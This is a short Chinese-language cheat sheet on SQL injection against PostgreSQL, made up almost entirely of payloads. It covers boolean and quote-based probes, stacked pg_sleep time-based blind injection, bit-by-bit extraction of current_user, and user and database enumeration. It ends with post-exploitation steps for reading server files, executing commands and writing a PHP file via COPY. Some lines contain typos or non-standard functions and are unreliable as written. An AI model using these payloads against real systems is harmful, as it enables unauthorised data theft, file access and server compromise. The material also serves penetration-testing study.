一、postgresql简介
postgresql是一款关系型数据库,广泛应用在web编程当中,由于其语法与MySQL不尽相同,所以其SQL注入又自成一派。
二、postgresql的SQL注入:(注意注释符号--+)
1、简单的有回显的SQL注入不用多说,还是基本的SQL语句直接查询就可以了。
#简单的payload
parameter = 2-1
parameter = 1 and 1 = 2
parameter = 1 or 1 = 2-1
parameter = 1' and '1'='1#and -> or
parameter = 1' and '1'='2#and -> or
或者引号区分发(适用于字符串)
parameter = 1 #Success
parameter = 1' #Failed
parameter = 1'' #Success
2、一般的基于时间的盲注,可以参考下面的办法:
#postgresql 的几个简单判断payload:
parameter=1;select pg_sleep(5)
parameter=1';select pg_sleep(5)
parameter=1');select pg_sleep(5)
parameter=1);select pg_sleep(5)
parameter=1));select pg_sleep(5)
parameter=select pg_sleep(5)
盲注的逐位猜解
SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({current_user}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+3、常见的函数查看一些基本信息:
SELECT version() #查看版本信息
#查看用户
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;#这里是usename不是username
SELECT getpgusername();
#查看当前数据库
SELECT current_database()
4、postgresql下的if
#mysql的
if(expr1,result1,result2);
#如果expr1满足,result1,否则result2 #对于postgresql
select case when(expr1) then result1 else result2 end; #举个例子
select casr when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;
5、其他
(1)读取文件:
select pg_read_file(filepath+filename);
(2)执行命令:
select system("comamnd_string");(3)写入文件:
COPY (select '<?php phpinfo();?>') to '/tmp/1.php';